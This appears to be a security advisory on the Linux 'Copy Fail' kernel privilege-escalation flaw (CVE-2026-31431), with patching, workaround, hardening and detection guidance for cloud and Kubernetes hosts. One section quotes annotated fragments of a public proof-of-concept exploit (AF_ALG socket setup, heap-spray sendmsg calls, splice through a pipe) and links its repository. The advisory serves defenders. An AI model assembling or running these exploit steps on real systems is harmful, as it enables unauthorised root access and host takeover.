CVE-2026-31431: Copy Fail Linux Root Privilege Escalation


A newly disclosed Linux flaw nicknamed "Copy Fail" and tracked as **CVE-2026-31431** lets an unprivileged local user climb all the way to root, and a working exploit is already publicly available. The bug lives in the kernel's `algif_aead` crypto interface and is driven through the `AF_ALG` socket family combined with `splice()` and `sendmsg()`. Because the only prerequisite is the ability to run code on the host, any container breakout, web shell, or compromised CI job can be chained into full system takeover. Cloud and Kubernetes operators should patch kernels and rotate node images without waiting for the next maintenance window.

What "Copy Fail" actually is

According to the NVD entry for CVE-2026-31431 and the official CVE record, the issue was resolved in the Linux kernel with a change described as "crypto: algif_aead - Revert to operating out-of-place." In other words, the vulnerable code path performed authenticated-encryption (AEAD) operations in-place when it should have been operating out-of-place, and the fix reverts that behavior. The "Copy Fail" branding lines up with the exploitation primitive: data is shuffled between a file, an anonymous pipe, and a crypto socket using splice(), and the mishandled copy is what an attacker abuses.

Some early write-ups framed the bug as a time-of-check/time-of-use race in a generic memory-copy path. That characterization isn't supported by the upstream advisory, so treat the algif_aead crypto-subsystem description above as the authoritative one.

The flaw is rated high-severity. No precise CVSS figure is published in the material reviewed here, so we are not quoting one. The report attributing the disclosure to Microsoft Security researchers comes from secondary coverage rather than the CVE record, so take that detail as reported rather than confirmed. What is clear and consequential is the impact class: local privilege escalation to root, which needs no network access at all.

Why cloud and Kubernetes hosts are higher risk

On a single-tenant server, local privilege escalation assumes the attacker already has a shell — a real hurdle. In cloud-native stacks that hurdle is much lower, because untrusted code runs on shared kernels routinely:

Multi-tenant Kubernetes: a workload compromised in one namespace can use the exploit to break out to the host node, collapsing isolation and potentially reaching other tenants.
CI/CD runners: build agents pull third-party dependencies constantly. A malicious package that gains execution during a build can chain Copy Fail to root the runner.
Shared-tenancy VMs and managed node pools: anywhere multiple workloads share one host kernel, the blast radius of a single successful exploit grows.
Serverless and edge runtimes: lightweight environments that share a kernel rather than booting full VMs may be affected, depending on the kernel build in use.

The common denominator is the kernel itself: any process — containerized or not — running on a vulnerable kernel and able to execute arbitrary code is a viable launch point.

How the exploit works

A public proof-of-concept is published at github.com/JuanBindez/CVE-2026-31431, with companion write-ups at copy.fail and xint.io. The annotations below are the PoC author's own analysis of what each step does — useful for understanding the technique, but the comments themselves are interpretive (note the question marks in the original), not settled fact.

The exploit first opens a kernel crypto socket via AF_ALG (family 38) and binds it to an AEAD transform:


a = s.socket(38, 5, 0)  # AF_ALG = 38 (kernel crypto interface)
a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))

It then sets a crafted key and other socket options against the ALG subsystem, with the key bytes acting as the likely trigger:


v(h, 1, d('0800010000000010'+'0'*64))  # option 1
v(h, 5, None, 4)                        # option 5 (NULL payload)

Next it sprays the kernel heap by issuing sendmsg() calls carrying ancillary control messages, where a per-iteration counter (i) varies the sizes to shape memory:


u.sendmsg([b"A"*4+c], [
    (h, 3, i*4),           # cmsg level 3 (ALG_OP?)
    (h, 2, b'\x10'+i*19),  # cmsg level 2
    (h, 4, b'\x08'+i*3)    # cmsg level 4
], 32768)

Finally, it moves data through an anonymous pipe and into the crypto socket with splice(), which is where the faulty copy is exercised:


r, w = g.pipe()           # create anonymous pipe
g.splice(f, w, o, offset_src=0)      # copy from file to pipe
g.splice(r, u.fileno(), o)           # copy from pipe to socket

A successful run drops the operator into a root shell; the PoC simply confirms it by running id and checking for uid=0.

Exploit status and threat activity

With a reliable privilege-escalation PoC already circulating, the remediation window collapses from weeks to days. Historically, opportunistic ransomware affiliates and more capable APT groups fold public LPE exploits into their tooling within days of release. Treat this as an active threat, not a hypothetical one — especially since the exploit can leave few filesystem artifacts, making behavioral detection the more dependable signal.

Detection and mitigation

Patch first. Updating the kernel to a fixed build is the definitive remedy. For distribution packages:


For Ubuntu/Debian: sudo apt update, sudo apt upgrade -y
For RHEL-based systems: sudo yum update

For Kubernetes, roll node pools onto patched OS images and drain the old nodes. Because the supplied advisories don't enumerate exact vulnerable and fixed kernel version strings, confirm specifics against your distribution's and cloud provider's security bulletins before declaring a host clean.

Temporary workaround — disable the affected module. Where you can't patch immediately, you can block the vulnerable crypto module from loading and unload it if present (the two commands below were mashed together by the source's scraper and are shown split):


echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead 2>/dev/null || true

Additional hardening:

Reduce local execution: aggressively apply least privilege to who and what can run code on sensitive hosts.
Mandatory access control: seccomp profiles and AppArmor/SELinux policies can restrict the syscalls available to a workload, potentially cutting off the AF_ALG/splice sequence this exploit relies on.
Restrict unprivileged user namespaces where your distribution supports it, to raise the bar for some exploitation paths.
Isolate untrusted workloads on VM-backed sandboxes such as gVisor or Kata Containers so they don't share a kernel with sensitive code.
Network segmentation won't stop the LPE itself but shrinks the set of footholds that could deliver initial code execution.

Detecting exploitation or post-exploitation:

Kernel audit logging: add auditd rules for unexpected setuid/setgid calls and processes running with privileges they shouldn't have.
Runtime security tooling: Falco, Microsoft Defender for Containers, and cloud-native EDR can flag kernel-level anomalies consistent with privilege escalation.
Container-escape indicators: watch for containers touching host namespaces, unexpected nsenter or chroot use, or capabilities outside a workload's security context.
Integrity monitoring: alert on changes to /etc/passwd, /etc/sudoers, or SUID binaries that suggest persistence.

Why this deserves priority

A root-level escalation in a shared cloud host is not a contained event — every workload, secret, and credential on that node is exposed, and a compromised Kubernetes node can become a stepping stone toward the control plane if RBAC and network policy aren't tight. A public exploit shortens the safe-to-wait period dramatically, and compliance regimes such as SOC 2, PCI-DSS, and ISO 27001 increasingly expect documented response times for critical kernel bugs with known exploits. Patch the kernels, rotate the node pools, and turn on runtime detection now.

References